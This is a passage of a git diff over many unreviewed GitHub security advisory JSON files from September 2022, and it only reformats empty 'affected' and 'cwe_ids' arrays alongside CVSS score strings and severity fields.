a/advisories/unreviewed/2022/09/GHSA-8xcf-8ggp-m7gj/GHSA-8xcf-8ggp-m7gj.json b/advisories/unreviewed/2022/09/GHSA-8xcf-8ggp-m7gj/GHSA-8xcf-8ggp-m7gj.json index 31ecb9ccaf9..20eb69c9b77 100644 --- a/advisories/unreviewed/2022/09/GHSA-8xcf-8ggp-m7gj/GHSA-8xcf-8ggp-m7gj.json +++ b/advisories/unreviewed/2022/09/GHSA-8xcf-8ggp-m7gj/GHSA-8xcf-8ggp-m7gj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-98r4-4f3j-q239/GHSA-98r4-4f3j-q239.json b/advisories/unreviewed/2022/09/GHSA-98r4-4f3j-q239/GHSA-98r4-4f3j-q239.json index 12981d2152c..412078569cd 100644 --- a/advisories/unreviewed/2022/09/GHSA-98r4-4f3j-q239/GHSA-98r4-4f3j-q239.json +++ b/advisories/unreviewed/2022/09/GHSA-98r4-4f3j-q239/GHSA-98r4-4f3j-q239.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-9vv6-62qf-hh55/GHSA-9vv6-62qf-hh55.json b/advisories/unreviewed/2022/09/GHSA-9vv6-62qf-hh55/GHSA-9vv6-62qf-hh55.json index 04dad4ea53a..7f1d1d86c05 100644 --- a/advisories/unreviewed/2022/09/GHSA-9vv6-62qf-hh55/GHSA-9vv6-62qf-hh55.json +++ b/advisories/unreviewed/2022/09/GHSA-9vv6-62qf-hh55/GHSA-9vv6-62qf-hh55.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-c2f5-g88r-g7jp/GHSA-c2f5-g88r-g7jp.json b/advisories/unreviewed/2022/09/GHSA-c2f5-g88r-g7jp/GHSA-c2f5-g88r-g7jp.json index 411f8d069ac..0e6c8856daa 100644 --- a/advisories/unreviewed/2022/09/GHSA-c2f5-g88r-g7jp/GHSA-c2f5-g88r-g7jp.json +++ b/advisories/unreviewed/2022/09/GHSA-c2f5-g88r-g7jp/GHSA-c2f5-g88r-g7jp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-c65m-86j4-57vv/GHSA-c65m-86j4-57vv.json b/advisories/unreviewed/2022/09/GHSA-c65m-86j4-57vv/GHSA-c65m-86j4-57vv.json index 64545d5436f..4a7525f9e25 100644 --- a/advisories/unreviewed/2022/09/GHSA-c65m-86j4-57vv/GHSA-c65m-86j4-57vv.json +++ b/advisories/unreviewed/2022/09/GHSA-c65m-86j4-57vv/GHSA-c65m-86j4-57vv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-cc3x-hwc5-9pfq/GHSA-cc3x-hwc5-9pfq.json b/advisories/unreviewed/2022/09/GHSA-cc3x-hwc5-9pfq/GHSA-cc3x-hwc5-9pfq.json index 1ecaafb4e74..14156eb36ed 100644 --- a/advisories/unreviewed/2022/09/GHSA-cc3x-hwc5-9pfq/GHSA-cc3x-hwc5-9pfq.json +++ b/advisories/unreviewed/2022/09/GHSA-cc3x-hwc5-9pfq/GHSA-cc3x-hwc5-9pfq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-cpqw-x96c-hvhh/GHSA-cpqw-x96c-hvhh.json b/advisories/unreviewed/2022/09/GHSA-cpqw-x96c-hvhh/GHSA-cpqw-x96c-hvhh.json index 9e03499a1af..f9bbaec87b6 100644 --- a/advisories/unreviewed/2022/09/GHSA-cpqw-x96c-hvhh/GHSA-cpqw-x96c-hvhh.json +++ b/advisories/unreviewed/2022/09/GHSA-cpqw-x96c-hvhh/GHSA-cpqw-x96c-hvhh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-f67v-5x5c-x8vr/GHSA-f67v-5x5c-x8vr.json b/advisories/unreviewed/2022/09/GHSA-f67v-5x5c-x8vr/GHSA-f67v-5x5c-x8vr.json index 1146f230de2..f4a46ae3e56 100644 --- a/advisories/unreviewed/2022/09/GHSA-f67v-5x5c-x8vr/GHSA-f67v-5x5c-x8vr.json +++ b/advisories/unreviewed/2022/09/GHSA-f67v-5x5c-x8vr/GHSA-f67v-5x5c-x8vr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-fhc7-6h7r-f5p6/GHSA-fhc7-6h7r-f5p6.json b/advisories/unreviewed/2022/09/GHSA-fhc7-6h7r-f5p6/GHSA-fhc7-6h7r-f5p6.json index a15ab9c3854..a2fda264c02 100644 --- a/advisories/unreviewed/2022/09/GHSA-fhc7-6h7r-f5p6/GHSA-fhc7-6h7r-f5p6.json +++ b/advisories/unreviewed/2022/09/GHSA-fhc7-6h7r-f5p6/GHSA-fhc7-6h7r-f5p6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-ggg4-hcxv-87v9/GHSA-ggg4-hcxv-87v9.json b/advisories/unreviewed/2022/09/GHSA-ggg4-hcxv-87v9/GHSA-ggg4-hcxv-87v9.json index c33dd0867d5..e49f6204e49 100644 --- a/advisories/unreviewed/2022/09/GHSA-ggg4-hcxv-87v9/GHSA-ggg4-hcxv-87v9.json +++ b/advisories/unreviewed/2022/09/GHSA-ggg4-hcxv-87v9/GHSA-ggg4-hcxv-87v9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-gm96-5f79-f6q3/GHSA-gm96-5f79-f6q3.json b/advisories/unreviewed/2022/09/GHSA-gm96-5f79-f6q3/GHSA-gm96-5f79-f6q3.json index 2d430e8b52e..552b4a49d78 100644 --- a/advisories/unreviewed/2022/09/GHSA-gm96-5f79-f6q3/GHSA-gm96-5f79-f6q3.json +++ b/advisories/unreviewed/2022/09/GHSA-gm96-5f79-f6q3/GHSA-gm96-5f79-f6q3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-h886-rpm5-x6pr/GHSA-h886-rpm5-x6pr.json b/advisories/unreviewed/2022/09/GHSA-h886-rpm5-x6pr/GHSA-h886-rpm5-x6pr.json index c7e2d2c12dd..bd9bb4f25e9 100644 --- a/advisories/unreviewed/2022/09/GHSA-h886-rpm5-x6pr/GHSA-h886-rpm5-x6pr.json +++ b/advisories/unreviewed/2022/09/GHSA-h886-rpm5-x6pr/GHSA-h886-rpm5-x6pr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-h9c4-pjqq-xffc/GHSA-h9c4-pjqq-xffc.json b/advisories/unreviewed/2022/09/GHSA-h9c4-pjqq-xffc/GHSA-h9c4-pjqq-xffc.json index a91c6c97116..b96fe20c924 100644 --- a/advisories/unreviewed/2022/09/GHSA-h9c4-pjqq-xffc/GHSA-h9c4-pjqq-xffc.json +++ b/advisories/unreviewed/2022/09/GHSA-h9c4-pjqq-xffc/GHSA-h9c4-pjqq-xffc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-hf58-wxpq-9pg5/GHSA-hf58-wxpq-9pg5.json b/advisories/unreviewed/2022/09/GHSA-hf58-wxpq-9pg5/GHSA-hf58-wxpq-9pg5.json index eea3ae7f0ff..f291f14889c 100644 --- a/advisories/unreviewed/2022/09/GHSA-hf58-wxpq-9pg5/GHSA-hf58-wxpq-9pg5.json +++ b/advisories/unreviewed/2022/09/GHSA-hf58-wxpq-9pg5/GHSA-hf58-wxpq-9pg5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-hh3j-qq6p-7797/GHSA-hh3j-qq6p-7797.json b/advisories/unreviewed/2022/09/GHSA-hh3j-qq6p-7797/GHSA-hh3j-qq6p-7797.json index 8d4e7d1fe7e..22a13bea132 100644 --- a/advisories/unreviewed/2022/09/GHSA-hh3j-qq6p-7797/GHSA-hh3j-qq6p-7797.json +++ b/advisories/unreviewed/2022/09/GHSA-hh3j-qq6p-7797/GHSA-hh3j-qq6p-7797.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-hj8m-g2fw-34rv/GHSA-hj8m-g2fw-34rv.json b/advisories/unreviewed/2022/09/GHSA-hj8m-g2fw-34rv/GHSA-hj8m-g2fw-34rv.json index c4a3c3c2f7b..115d2dbbeb0 100644 --- a/advisories/unreviewed/2022/09/GHSA-hj8m-g2fw-34rv/GHSA-hj8m-g2fw-34rv.json +++ b/advisories/unreviewed/2022/09/GHSA-hj8m-g2fw-34rv/GHSA-hj8m-g2fw-34rv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-hw62-5m9w-9pm8/GHSA-hw62-5m9w-9pm8.json b/advisories/unreviewed/2022/09/GHSA-hw62-5m9w-9pm8/GHSA-hw62-5m9w-9pm8.json index 56ce5ca974f..eea3faecd02 100644 --- a/advisories/unreviewed/2022/09/GHSA-hw62-5m9w-9pm8/GHSA-hw62-5m9w-9pm8.json +++ b/advisories/unreviewed/2022/09/GHSA-hw62-5m9w-9pm8/GHSA-hw62-5m9w-9pm8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-j588-5q9c-p6xm/GHSA-j588-5q9c-p6xm.json b/advisories/unreviewed/2022/09/GHSA-j588-5q9c-p6xm/GHSA-j588-5q9c-p6xm.json index 29616079818..2a0cd10aaaf 100644 --- a/advisories/unreviewed/2022/09/GHSA-j588-5q9c-p6xm/GHSA-j588-5q9c-p6xm.json +++ b/advisories/unreviewed/2022/09/GHSA-j588-5q9c-p6xm/GHSA-j588-5q9c-p6xm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-j65m-4mmp-29cm/GHSA-j65m-4mmp-29cm.json b/advisories/unreviewed/2022/09/GHSA-j65m-4mmp-29cm/GHSA-j65m-4mmp-29cm.json index dfbd2ca5ee0..4990182f0d3 100644 --- a/advisories/unreviewed/2022/09/GHSA-j65m-4mmp-29cm/GHSA-j65m-4mmp-29cm.json +++ b/advisories/unreviewed/2022/09/GHSA-j65m-4mmp-29cm/GHSA-j65m-4mmp-29cm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-j78f-66qm-2mcw/GHSA-j78f-66qm-2mcw.json b/advisories/unreviewed/2022/09/GHSA-j78f-66qm-2mcw/GHSA-j78f-66qm-2mcw.json index 0b21aa6c8d1..dc28a6317e8 100644 --- a/advisories/unreviewed/2022/09/GHSA-j78f-66qm-2mcw/GHSA-j78f-66qm-2mcw.json +++ b/advisories/unreviewed/2022/09/GHSA-j78f-66qm-2mcw/GHSA-j78f-66qm-2mcw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-jcg9-774r-mm8x/GHSA-jcg9-774r-mm8x.json b/advisories/unreviewed/2022/09/GHSA-jcg9-774r-mm8x/GHSA-jcg9-774r-mm8x.json index 21d99118dd9..38a184a07c2 100644 --- a/advisories/unreviewed/2022/09/GHSA-jcg9-774r-mm8x/GHSA-jcg9-774r-mm8x.json +++ b/advisories/unreviewed/2022/09/GHSA-jcg9-774r-mm8x/GHSA-jcg9-774r-mm8x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-mhpj-fprx-gcxh/GHSA-mhpj-fprx-gcxh.json b/advisories/unreviewed/2022/09/GHSA-mhpj-fprx-gcxh/GHSA-mhpj-fprx-gcxh.json index d5020c50642..16845a3eb55 100644 --- a/advisories/unreviewed/2022/09/GHSA-mhpj-fprx-gcxh/GHSA-mhpj-fprx-gcxh.json +++ b/advisories/unreviewed/2022/09/GHSA-mhpj-fprx-gcxh/GHSA-mhpj-fprx-gcxh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-pwpx-qj2c-fq5c/GHSA-pwpx-qj2c-fq5c.json b/advisories/unreviewed/2022/09/GHSA-pwpx-qj2c-fq5c/GHSA-pwpx-qj2c-fq5c.json index ab2d0f4ce38..dc86d9ce3cc 100644 --- a/advisories/unreviewed/2022/09/GHSA-pwpx-qj2c-fq5c/GHSA-pwpx-qj2c-fq5c.json +++ b/advisories/unreviewed/2022/09/GHSA-pwpx-qj2c-fq5c/GHSA-pwpx-qj2c-fq5c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-q638-4gfp-67hc/GHSA-q638-4gfp-67hc.json b/advisories/unreviewed/2022/09/GHSA-q638-4gfp-67hc/GHSA-q638-4gfp-67hc.json index 4ecbafc7b2a..42e25dbe47d 100644 --- a/advisories/unreviewed/2022/09/GHSA-q638-4gfp-67hc/GHSA-q638-4gfp-67hc.json +++ b/advisories/unreviewed/2022/09/GHSA-q638-4gfp-67hc/GHSA-q638-4gfp-67hc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-qfmw-4w5x-xhxf/GHSA-qfmw-4w5x-xhxf.json b/advisories/unreviewed/2022/09/GHSA-qfmw-4w5x-xhxf/GHSA-qfmw-4w5x-xhxf.json index 60e7ad29530..a553b624e51 100644 --- a/advisories/unreviewed/2022/09/GHSA-qfmw-4w5x-xhxf/GHSA-qfmw-4w5x-xhxf.json +++ b/advisories/unreviewed/2022/09/GHSA-qfmw-4w5x-xhxf/GHSA-qfmw-4w5x-xhxf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-qfvq-h39h-4m98/GHSA-qfvq-h39h-4m98.json b/advisories/unreviewed/2022/09/GHSA-qfvq-h39h-4m98/GHSA-qfvq-h39h-4m98.json index ca15fa4e3e2..31c1bcc93a8 100644 --- a/advisories/unreviewed/2022/09/GHSA-qfvq-h39h-4m98/GHSA-qfvq-h39h-4m98.json +++ b/advisories/unreviewed/2022/09/GHSA-qfvq-h39h-4m98/GHSA-qfvq-h39h-4m98.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-qhg5-w79j-3jj3/GHSA-qhg5-w79j-3jj3.json b/advisories/unreviewed/2022/09/GHSA-qhg5-w79j-3jj3/GHSA-qhg5-w79j-3jj3.json index 46c561fee12..45155133c88 100644 --- a/advisories/unreviewed/2022/09/GHSA-qhg5-w79j-3jj3/GHSA-qhg5-w79j-3jj3.json +++ b/advisories/unreviewed/2022/09/GHSA-qhg5-w79j-3jj3/GHSA-qhg5-w79j-3jj3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-qrf6-gx4g-hqv9/GHSA-qrf6-gx4g-hqv9.json b/advisories/unreviewed/2022/09/GHSA-qrf6-gx4g-hqv9/GHSA-qrf6-gx4g-hqv9.json index e18d96d6678..bca1d8c6852 100644 --- a/advisories/unreviewed/2022/09/GHSA-qrf6-gx4g-hqv9/GHSA-qrf6-gx4g-hqv9.json +++ b/advisories/unreviewed/2022/09/GHSA-qrf6-gx4g-hqv9/GHSA-qrf6-gx4g-hqv9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-qrj8-rh2f-3cj9/GHSA-qrj8-rh2f-3cj9.json b/advisories/unreviewed/2022/09/GHSA-qrj8-rh2f-3cj9/GHSA-qrj8-rh2f-3cj9.json index 21a60e251a7..5861144161b 100644 --- a/advisories/unreviewed/2022/09/GHSA-qrj8-rh2f-3cj9/GHSA-qrj8-rh2f-3cj9.json +++ b/advisories/unreviewed/2022/09/GHSA-qrj8-rh2f-3cj9/GHSA-qrj8-rh2f-3cj9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-rm7v-mc66-6r49/GHSA-rm7v-mc66-6r49.json b/advisories/unreviewed/2022/09/GHSA-rm7v-mc66-6r49/GHSA-rm7v-mc66-6r49.json index f0d4b8a2e77..7173e4dc0bc 100644 --- a/advisories/unreviewed/2022/09/GHSA-rm7v-mc66-6r49/GHSA-rm7v-mc66-6r49.json +++ b/advisories/unreviewed/2022/09/GHSA-rm7v-mc66-6r49/GHSA-rm7v-mc66-6r49.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-rrrr-cw7x-rf7j/GHSA-rrrr-cw7x-rf7j.json b/advisories/unreviewed/2022/09/GHSA-rrrr-cw7x-rf7j/GHSA-rrrr-cw7x-rf7j.json index 2b10bb6a293..7083b8f5f70 100644 --- a/advisories/unreviewed/2022/09/GHSA-rrrr-cw7x-rf7j/GHSA-rrrr-cw7x-rf7j.json +++ b/advisories/unreviewed/2022/09/GHSA-rrrr-cw7x-rf7j/GHSA-rrrr-cw7x-rf7j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-rvpq-xxmq-5x83/GHSA-rvpq-xxmq-5x83.json b/advisories/unreviewed/2022/09/GHSA-rvpq-xxmq-5x83/GHSA-rvpq-xxmq-5x83.json index f16ce302ea9..5f75170d06e 100644 --- a/advisories/unreviewed/2022/09/GHSA-rvpq-xxmq-5x83/GHSA-rvpq-xxmq-5x83.json +++ b/advisories/unreviewed/2022/09/GHSA-rvpq-xxmq-5x83/GHSA-rvpq-xxmq-5x83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-rvxx-h83g-7vgf/GHSA-rvxx-h83g-7vgf.json b/advisories/unreviewed/2022/09/GHSA-rvxx-h83g-7vgf/GHSA-rvxx-h83g-7vgf.json index f6272d9d714..ed8f66d9217 100644 --- a/advisories/unreviewed/2022/09/GHSA-rvxx-h83g-7vgf/GHSA-rvxx-h83g-7vgf.json +++ b/advisories/unreviewed/2022/09/GHSA-rvxx-h83g-7vgf/GHSA-rvxx-h83g-7vgf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-vc7q-8w3h-jx8q/GHSA-vc7q-8w3h-jx8q.json b/advisories/unreviewed/2022/09/GHSA-vc7q-8w3h-jx8q/GHSA-vc7q-8w3h-jx8q.json index 7cf518c3ea9..0501b0e39b3 100644 --- a/advisories/unreviewed/2022/09/GHSA-vc7q-8w3h-jx8q/GHSA-vc7q-8w3h-jx8q.json +++ b/advisories/unreviewed/2022/09/GHSA-vc7q-8w3h-jx8q/GHSA-vc7q-8w3h-jx8q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-vhxm-j92c-jf79/GHSA-vhxm-j92c-jf79.json b/advisories/unreviewed/2022/09/GHSA-vhxm-j92c-jf79/GHSA-vhxm-j92c-jf79.json index 4ac1416ac14..0adda26f564 100644 --- a/advisories/unreviewed/2022/09/GHSA-vhxm-j92c-jf79/GHSA-vhxm-j92c-jf79.json +++ b/advisories/unreviewed/2022/09/GHSA-vhxm-j92c-jf79/GHSA-vhxm-j92c-jf79.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-w397-9p2j-6x23/GHSA-w397-9p2j-6x23.json b/advisories/unreviewed/2022/09/GHSA-w397-9p2j-6x23/GHSA-w397-9p2j-6x23.json index d534d37ffd0..f049dc7b0a0 100644 --- a/advisories/unreviewed/2022/09/GHSA-w397-9p2j-6x23/GHSA-w397-9p2j-6x23.json +++ b/advisories/unreviewed/2022/09/GHSA-w397-9p2j-6x23/GHSA-w397-9p2j-6x23.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-wffm-j7m8-93g4/GHSA-wffm-j7m8-93g4.json b/advisories/unreviewed/2022/09/GHSA-wffm-j7m8-93g4/GHSA-wffm-j7m8-93g4.json index 28419efff25..9f4d71574b2 100644 --- a/advisories/unreviewed/2022/09/GHSA-wffm-j7m8-93g4/GHSA-wffm-j7m8-93g4.json +++ b/advisories/unreviewed/2022/09/GHSA-wffm-j7m8-93g4/GHSA-wffm-j7m8-93g4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-wjvx-p9xx-8cxp/GHSA-wjvx-p9xx-8cxp.json b/advisories/unreviewed/2022/09/GHSA-wjvx-p9xx-8cxp/GHSA-wjvx-p9xx-8cxp.json index dfcc4c9f6ad..99595b405ea 100644 --- a/advisories/unreviewed/2022/09/GHSA-wjvx-p9xx-8cxp/GHSA-wjvx-p9xx-8cxp.json +++ b/advisories/unreviewed/2022/09/GHSA-wjvx-p9xx-8cxp/GHSA-wjvx-p9xx-8cxp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/09/GHSA-ww8h-58w2-5v3c/GHSA-ww8h-58w2-5v3c.json b/advisories/unreviewed/2022/09/GHSA-ww8h-58w2-5v3c/GHSA-ww8h-58w2-5v3c.json index 7529116cf64..9eadccf1aef 100644 --- a/advisories/unreviewed/2022/09/GHSA-ww8h-58w2-5v3c/GHSA-ww8h-58w2-5v3c.json +++ b/advisories/unreviewed/2022/09/GHSA-ww8h-58w2-5v3c/GHSA-ww8h-58w2-5v3c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/09/GHSA-x2rq-mrc8-r79h/GHSA-x2rq-mrc8-r79h.json b/advisories/unreviewed/2022/09/GHSA-x2rq-mrc8-r79h/GHSA-x2rq-mrc8-r79h.json index e72e701faec..2a94953c9b7 100644 --- a/advisories/unreviewed/2022/09/GHSA-x2rq-mrc8-r79h/GHSA-x2rq-mrc8-r79h.json +++ b/advisories/unreviewed/2022/09/GHSA-x2rq-mrc8-r79h/GHSA-x2rq-mrc8-r79h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { 